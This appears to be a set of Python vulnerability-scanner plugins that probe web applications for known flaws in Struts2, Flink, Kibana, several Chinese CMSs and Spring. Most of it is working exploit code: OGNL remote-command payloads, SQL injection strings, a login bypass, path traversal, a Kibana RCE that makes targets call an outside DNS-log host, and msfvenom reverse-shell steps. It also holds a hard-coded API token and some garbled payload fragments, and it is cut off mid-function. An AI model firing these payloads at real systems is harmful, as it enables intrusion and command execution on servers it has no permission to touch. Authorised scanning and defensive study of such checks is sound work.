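def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Check whether the target serves /WEB-INF/web.xml (Java config disclosure).

    Args:
        Url: target base URL; the probe path is appended to it unchanged.
        RandomAgent: User-Agent string sent with the probe.
        proxies: proxy spec, normalised through Proxies().result().
        **kwargs: forwarded to VulnerabilityDetails(...).Write().

    Returns:
        None. A finding is recorded via VulnerabilityDetails and WriteFile; any
        exception is routed to ErrorHandling/ErrorLog instead of being raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)  # only `url` is used below
    try:
        payload = "/WEB-INF/web.xml"
        payload_url = Url + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=6, verify=False)
        con = resp.text
        # .get() instead of []: a response with no Content-Type used to raise
        # KeyError and was logged as a plugin error rather than a clean miss.
        # Only the media type is compared, so "application/xml;charset=UTF-8"
        # is also accepted.
        content_type = resp.headers.get("Content-Type", "").split(";")[0].strip()
        if resp.status_code == 200 and content_type == "application/xml":
            Medusa = "{}存在Java配置文件泄露漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write(url, plugin_name)  # log target URL and the failing plugin name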
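def medusa(Url, RandomAgent, UnixTimestamp):
    """Probe /index.action for the Struts2 S2-009 issue and record a finding.

    The body in ``data`` is POSTed unchanged; ``Result(con)`` (a project helper
    whose semantics are not visible here) classifies the response and a finding
    is recorded only when it returns "Linux", "NoteOS" or "Windows".

    Args:
        Url: target URL, split by UrlProcessing().result() into scheme/host/port.
        RandomAgent: User-Agent string for the request.
        UnixTimestamp: passed through to VulnerabilityDetails(...).Write().

    Returns:
        None. This plugin has no proxy support; any exception is written to
        ErrorLog and swallowed.
    """
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none; an explicit
    # port is kept (the former `else: port = port` branch was a no-op).
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    data = '''class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]'''
    try:
        payload_url = scheme + "://" + url + ":" + str(port) + "/index.action"
        headers = {
            'User-Agent': RandomAgent,
            "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        resp = requests.post(payload_url, headers=headers, data=data, timeout=6, verify=False)
        con = resp.text
        detected_os = Result(con)
        if detected_os in ("Linux", "NoteOS", "Windows"):
            Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-009\r\n返回数据:{}\r\n部署系统:{}\r\n".format(
                url, con, detected_os)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorLog().Write(url, plugin_name)  # log target URL and the failing plugin name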
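def medusa(Url, RandomAgent, Token, proxies=None):
    """Check whether the Flink web UI's /jar/upload endpoint is reachable unauthenticated.

    A GET to /jar/upload that answers 404 with the text
    "Unable to load requested file /jar/upload" is treated as the fingerprint
    of an exposed upload endpoint and recorded as a finding.

    Args:
        Url: target URL, split by UrlProcessing().result().
        RandomAgent: User-Agent string for the request.
        Token: passed through to VulnerabilityDetails(...).Write().
        proxies: proxy spec, normalised through Proxies().result().

    Returns:
        None. Exceptions are reported via ErrorHandling/ErrorLog, not raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        payload_url = scheme + "://" + url + ":" + str(port) + '/jar/upload'
        # Free-text remediation/verification note embedded in the report body.
        getshell = "msfvenom -p java/shell_reverse_tcp lhost=you_ip lport=5555 -f jar >/root/Desktop/shell.jar\r\n生成jar包后在主页找到Submit New Job位置上传jar包\r\n最后点进上传好的jar包后再点击Submit即可在nc上getshell"
        resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if con.find("Unable to load requested file /jar/upload") != -1 and code == 404:
            Medusa = "{}存在Flink未授权命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回内容:{}\r\nGetshell方法:\r\n{}\r\n".format(
                url, payload_url, con, getshell)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, Token).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write(url, plugin_name)  # log target URL and the failing plugin name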
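def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check the EasyCMS search page for reflected script injection.

    A random marker wrapped in a <script> tag is POSTed as the ``s`` field and
    the finding is recorded only if the exact marker tag is echoed back with
    a 200 status, which keeps false positives from static page content low.

    Args:
        Url: target URL, split by UrlProcessing().result().
        Headers: request headers supplied by the caller (used as-is).
        proxies: proxy spec, normalised through Proxies().result().
        **kwargs: forwarded to VulnerabilityDetails(...).Write().

    Returns:
        None. Exceptions are reported via ErrorHandling/ErrorLog, not raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        marker = randoms().result(20)
        payload = "/index.php?s=/index/search/index.html"
        probe = '<script>confirm({})</script>'.format(marker)
        data = {'s': probe}
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        resp = requests.post(payload_url, headers=Headers, data=data, proxies=proxies, timeout=6, verify=False)
        con = resp.text
        if resp.status_code == 200 and con.find(probe) != -1:
            Medusa = "{}存在EasyCMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write("Plugin Name:" + plugin_name + " || Target Url:" + url, e)  # error log entry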
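def medusa(Url, RandomAgent, Token, proxies=None):
    """Check an Ecshop install for a PHP error page leaking path information.

    Requests the bundled FCKeditor spellchecker script and records a finding
    when the 200 response contains both "on line" and "in" (the shape of a
    PHP warning with a file path).

    Args:
        Url: target URL, split by UrlProcessing().result().
        RandomAgent: User-Agent string for the request.
        Token: passed through to VulnerabilityDetails(...).Write().
        proxies: proxy spec, normalised through Proxies().result().

    Returns:
        None. Exceptions are reported via ErrorHandling/ErrorLog, not raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = '/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php'
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # Session is closed on exit; the previous code leaked it.
        with requests.session() as s:
            resp = s.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        code = resp.status_code
        # str.find() returns -1 when absent, which is truthy; the original
        # `con.find(...) and con.find(...)` therefore matched almost any page.
        # Compare against -1 explicitly. NOTE(review): "in" is a very weak
        # marker on its own — consider a more specific substring.
        if code == 200 and con.find("on line") != -1 and con.find("in") != -1:
            Medusa = "{}存在Ecshop信息泄漏漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, Token).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write(url, plugin_name)  # log target URL and the failing plugin name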
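def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check BEESCMS for the session-variable login bypass.

    POSTs a body that sets ``_SESSION`` fields to /index.php and then to
    /admin/admin.php; a finding is recorded when the second response contains
    two admin-panel link fragments.

    Args:
        Url: target URL.
        RandomAgent: User-Agent string for both requests.
        proxies: proxy spec, normalised through Proxies().result().
        **kwargs: forwarded to VulnerabilityDetails(...).Write().

    Returns:
        None. Exceptions are reported via ErrorHandling/ErrorLog, not raised.
    """
    proxies = Proxies().result(proxies)
    # NOTE(review): the other plugins call UrlProcessing().result(Url); this
    # form is kept as written — confirm it unpacks to (scheme, host, port).
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/index.php"
        payload2 = "/admin/admin.php"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
        data = "_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=300000000000000000000000\r\n"
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # The first response is never inspected; presumably only its side
        # effect on the server matters — confirm, otherwise it can be dropped.
        requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=6, verify=False)
        resp2 = requests.post(payload_url2, headers=headers, data=data, proxies=proxies, timeout=6, verify=False)
        con = resp2.text
        if con.find("admin_form.php?action=form_list&nav=list_order") != -1 and con.find("admin_main.php?nav=main") != -1:
            Medusa = "{}存在BEESCMS登录绕过漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write("Plugin Name:" + plugin_name + " || Target Url:" + url, e)  # error log entry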
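def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check EnableQ's Export.log.inc.php for SQL injection via ExportSQL.

    The base64 ``ExportSQL`` value selects ``MD5(1)``; a finding is recorded
    when the 200 response contains that digest
    (c4ca4238a0b923820dcc509a6f75849b).

    Args:
        Url: target URL, split by UrlProcessing().result().
        RandomAgent: User-Agent string for the request.
        proxies: proxy spec, normalised through Proxies().result().
        **kwargs: forwarded to VulnerabilityDetails(...).Write().

    Returns:
        None. Exceptions are reported via ErrorHandling/ErrorLog, not raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = '/enableq/enableq91_php52/Export/Export.log.inc.php?ExportSQL=U0VMRUNUIGEuKixjb25jYXQoTUQ1KDEpLCc6JyxkYXRhYmFzZSgpKSBhcyBhZG1pbmlzdHJhdG9yc05hbWUgRlJPTSBlcV9hZG1pbmlzdHJhdG9yc2xvZyBhLCBlcV9hZG1pbmlzdHJhdG9ycyBiIFdIRVJFIGEuYWRtaW5pc3RyYXRvcnNJRD1iLmFkbWluaXN0cmF0b3JzSUQgT1JERVIgQlkgYS5hZG1pbmlzdHJhdG9yc0xvZ0lEIERFU0M='
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        if resp.status_code == 200 and con.find("c4ca4238a0b923820dcc509a6f75849b") != -1:
            Medusa = "{}存在EnableQSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write(url, plugin_name)  # log target URL and the failing plugin name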
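def medusa(Url, RandomAgent, UnixTimestamp):
    """Probe /index.action for the Struts2 S2-032 issue and record a finding.

    The query string in ``payload`` is appended unchanged; ``Result(con)`` (a
    project helper whose semantics are not visible here) classifies the
    response and a finding is recorded only when it returns "Linux",
    "NoteOS" or "Windows".

    Args:
        Url: target URL, split by UrlProcessing().result().
        RandomAgent: User-Agent string for the request.
        UnixTimestamp: passed through to VulnerabilityDetails(...).Write().

    Returns:
        None. No proxy support; any exception is written to ErrorLog and swallowed.
    """
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    # NOTE(review): the "[email protected]" fragment below looks like an
    # extraction artifact (an email-obfuscation rewrite of the committed text);
    # the payload as stored here is probably not what upstream has — verify.
    payload = '''?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=netstat -an&pp=____A&ppp=%20&encoding=UTF-8'''
    try:
        payload_url = scheme + "://" + url + ":" + str(port) + "/index.action" + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        resp = requests.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        detected_os = Result(con)
        if detected_os in ("Linux", "NoteOS", "Windows"):
            Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-032\r\n返回数据:{}\r\n部署系统:{}\r\n".format(
                url, con, detected_os)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorLog().Write(url, plugin_name)  # log target URL and the failing plugin name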
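def medusa(Url, RandomAgent, Token, proxies=None):
    """Check several Easethink endpoints for error-based SQL injection.

    Each entry of ``Payloads`` embeds ``md5(123)``; a finding is recorded for
    every payload whose 200 response contains the digest
    (202cb962ac59075b964b07152d234b70). Each request has its own try/except so
    one failing payload does not stop the others.

    Args:
        Url: target URL, split by UrlProcessing().result().
        RandomAgent: User-Agent string for the requests.
        Token: passed through to VulnerabilityDetails(...).Write().
        proxies: proxy spec, normalised through Proxies().result().

    Returns:
        None. Exceptions are reported via ErrorHandling/ErrorLog, not raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    Payloads = [
        '/ajax.php?act=check_field&field_name=a%27%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,md5(123),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)#',
        '/link.php?act=go&city=sanming&url=secer%27)%20and%20(updatexml(1,concat(0x3a,(select%20concat(md5(123))%20from%20jytuan_admin%20limit%201)),1))%23',
        '/vote.php?act=dovote&name[1 and (select 1 from(select count(*),concat(0x7c,md5(123),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23][111]=aa',
        "/subscribe.php?act=unsubscribe&code=secer') and (updatexml(1,concat(0x3a,(select concat(md5(123)) from easethink_admin limit 1)),1))#",
        "/sms.php?act=do_unsubscribe_verify&mobile=a' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,md5(123),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#"
    ]
    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    for payload in Payloads:
        try:
            payload_url = scheme + "://" + url + ":" + str(port) + payload
            # Session is closed on exit; the previous code leaked one per payload.
            with requests.session() as s:
                resp = s.get(payload_url, headers=headers, proxies=proxies, timeout=6, verify=False)
            con = resp.text
            if resp.status_code == 200 and con.find("202cb962ac59075b964b07152d234b70") != -1:
                Medusa = "{}存在EasethinkSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(url, payload_url, con)
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, url, Token).Write()  # record url and scan data
                WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
        except Exception as e:
            plugin_name = VulnerabilityInfo('').info.get('algroup')
            ErrorHandling().Outlier(e, plugin_name)
            ErrorLog().Write(url, plugin_name)  # log target URL and the failing plugin name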
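def medusa(Url, RandomAgent, UnixTimestamp):
    """Probe /index.action for the Struts2 S2-008 (debug=command) issue.

    The query string in ``payload`` is appended unchanged; ``Result(con)`` (a
    project helper whose semantics are not visible here) classifies the
    response and a finding is recorded only when it returns "Linux",
    "NoteOS" or "Windows".

    Args:
        Url: target URL, split by UrlProcessing().result().
        RandomAgent: User-Agent string for the request.
        UnixTimestamp: passed through to VulnerabilityDetails(...).Write().

    Returns:
        None. No proxy support; any exception is written to ErrorLog and swallowed.
    """
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    # NOTE(review): the two "[email protected]" fragments below look like an
    # extraction artifact (an email-obfuscation rewrite of the committed text);
    # the payload as stored here is probably not what upstream has — verify.
    payload = '''?debug=command&expression=(%23_memberAccess.allowStaticMethodAccess=true,%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23cmd="netstat -an",%[email protected]@getRuntime().exec(%23cmd),%23data=new+java.io.DataInputStream(%23ret.getInputStream()),%23res=new+byte[1000],%23data.readFully(%23res),%23echo=new+java.lang.String(%23res),%[email protected]@getResponse(),%23out.getWriter().println(%23echo))'''
    try:
        payload_url = scheme + "://" + url + ":" + str(port) + "/index.action" + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        resp = requests.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        detected_os = Result(con)
        if detected_os in ("Linux", "NoteOS", "Windows"):
            Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-008-2\r\n返回数据:{}\r\n部署系统:{}\r\n".format(
                url, con, detected_os)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorLog().Write(url, plugin_name)  # log target URL and the failing plugin name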
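def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check CmsTop's search controller for template-expression evaluation.

    Two URLs are tried: the ``/app/`` path on the given host and the bare
    path on an ``app``-prefixed hostname. A finding is recorded when a 200
    response contains the three phpinfo() markers.

    Args:
        Url: target URL, split by UrlProcessing().result().
        RandomAgent: User-Agent string for the requests.
        proxies: proxy spec, normalised through Proxies().result().
        **kwargs: forwarded to VulnerabilityDetails(...).Write().

    Returns:
        None. Exceptions are reported via ErrorHandling/ErrorLog, not raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    payload = "/app/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
    payloadurl = scheme + "://" + url + ":" + str(port) + payload
    payload2 = "/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
    # NOTE(review): the first label is dropped and "app" is prepended without a
    # separating dot, so "www.example.com" becomes "appexample.com"; an IP
    # literal is mangled too. Kept as written — confirm the intended hostname.
    domain_name = ".".join(url.split(".")[1:])
    payloadurl2 = scheme + "://app" + domain_name + ":" + str(port) + payload2
    Payloads = [payloadurl, payloadurl2]
    headers = {
        'User-Agent': RandomAgent,
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
    }
    for payload_url in Payloads:
        try:
            resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=6, verify=False)
            con = resp.text
            if resp.status_code == 200 and con.find('PHP Version') != -1 and con.find('Configure Command') != -1 and con.find('System') != -1:
                Medusa = "{}存在CmsTop远程代码执行漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, url, **kwargs).Write()  # record url and scan data
                WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
        except Exception as e:
            plugin_name = VulnerabilityInfo('').info.get('algroup')
            ErrorHandling().Outlier(e, plugin_name)
            ErrorLog().Write("Plugin Name:" + plugin_name + " || Target Url:" + url, e)  # error log entry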
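def medusa(Url, RandomAgent, UnixTimestamp):
    """Check for the Spring reflected-file-download / path traversal under /foo/profiles/.

    Four traversal paths are requested without following redirects; a finding
    is recorded when a 200 response contains passwd-style entries
    ("root:x:", "bin:x", "lp:x").

    Args:
        Url: target URL, split by UrlProcessing().result().
        RandomAgent: User-Agent string for the requests.
        UnixTimestamp: passed through to VulnerabilityDetails(...).Write().

    Returns:
        None. No proxy support; exceptions go to ErrorHandling/ErrorLog.
    """
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    # NOTE(review): the win.ini variants can never satisfy the Unix-style
    # markers checked below, so they only add requests — confirm the intent.
    payload1 = "/foo/profiles/..%28_%29Windows/win.ini"
    payload2 = "/foo/profiles/..%28_%29etc/hosts.allow"
    payload3 = "/foo/profiles/%252f..%252f..%252f..%252fetc/hosts.allow"
    payload4 = "/foo/profiles/%252f..%252f..%252f..%252fWindows/win.ini"
    headers = {
        'User-Agent': RandomAgent,
        'Accept': '*/*',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'en',
        'Connection': 'close',
        "Upgrade-Insecure-Requests": "1"
    }
    for path in [payload1, payload2, payload3, payload4]:
        try:
            payload_url = scheme + "://" + url + ":" + str(port) + path
            # Redirects are not followed so a catch-all redirect cannot
            # produce a false 200.
            resp = requests.get(payload_url, headers=headers, timeout=6, verify=False, allow_redirects=False)
            con = resp.text
            if resp.status_code == 200 and con.find("root:x:") != -1 and con.find("bin:x") != -1 and con.find("lp:x") != -1:
                Medusa = "{} 存在Spring反射文件下载漏洞\r\n漏洞地址:\r\n{}\r\n返回内容:\r\n{}".format(url, payload_url, con)
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()  # record url and scan data
                WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
        except Exception as e:
            plugin_name = VulnerabilityInfo('').info.get('algroup')
            ErrorHandling().Outlier(e, plugin_name)
            ErrorLog().Write(url, plugin_name)  # log target URL and the failing plugin name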
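def medusa(Url, RandomAgent, UnixTimestamp):
    """Check Kibana's Timelion endpoint for the prototype-pollution RCE (out-of-band).

    POSTs the Timelion sheet in ``payload_post`` (which carries a random
    marker), loads /app/canvas to trigger it, waits 5 s and then queries an
    external DNS-log service for the marker. A hit records a finding.

    Args:
        Url: target URL, split by UrlProcessing().result().
        RandomAgent: User-Agent string for the requests.
        UnixTimestamp: passed through to VulnerabilityDetails(...).Write().

    Returns:
        None. No proxy support; any exception is written to ErrorLog and swallowed.
    """
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload_url1 = scheme + '://' + url + ':' + str(port) + "/api/timelion/run"
        payload_url2 = scheme + '://' + url + ':' + str(port) + '/app/canvas'
        ran = randoms().result(10)
        # NOTE(review): the callback domain below is hard-coded; other plugins
        # on this page obtain it from Dnslog(). Sharing one static domain also
        # mixes results from every scanner instance that uses it.
        payload_post = '''{"sheet":[".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"ping %s.mdtx4t.ceye.io\");process.exit()//')\n.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')"],"time":{"from":"now-15m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}''' % ran
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/json;charset=utf-8',
            'Referer': scheme + '://' + url + ':' + str(port) + '/app/timelion',
            'Accept-Encoding': 'gzip, deflate',
            'Accept': 'application/json, text/plain, */*',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        }
        requests.post(payload_url1, headers=headers, data=payload_post, timeout=5, verify=False)
        requests.get(payload_url2, headers=headers, timeout=5, verify=False)
        # SECURITY(review): this is a live API credential committed in source.
        # It should be revoked and moved to configuration (the Dnslog() helper
        # used by sibling plugins is the obvious home); kept here only so the
        # plugin keeps working until that is done.
        dnslog = 'http://api.ceye.io/v1/records?token=2e01a5af9e65acf90a94597fce586b49&type=http&filter='
        time.sleep(5)  # give the out-of-band callback time to land
        resp3 = requests.get(dnslog, timeout=5, verify=False)
        con = resp3.text
        if con.find(ran) != -1:
            Medusa = "{}存在Kibana远程命令执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\nDNSlog数据:{}\r\n".format(url, payload_url1, con,)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorLog().Write(url, plugin_name)  # log target URL and the failing plugin name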
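def medusa(Url, RandomAgent, UnixTimestamp):
    """Check 74CMS's ajax_officebuilding.php for wide-byte SQL injection.

    The probe selects ``md5(7836457)``; a finding is recorded when the response
    contains that digest (3438d5e3ead84b2effc5ec33ed1239f5). The status code is
    deliberately not checked.

    Args:
        Url: target URL.
        RandomAgent: User-Agent string for the request.
        UnixTimestamp: passed through to VulnerabilityDetails(...).Write().

    Returns:
        None. No proxy support; exceptions go to ErrorHandling/ErrorLog.
    """
    # NOTE(review): the other plugins call UrlProcessing().result(Url); this
    # form is kept as written — confirm it unpacks to (scheme, host, port).
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL gave none.
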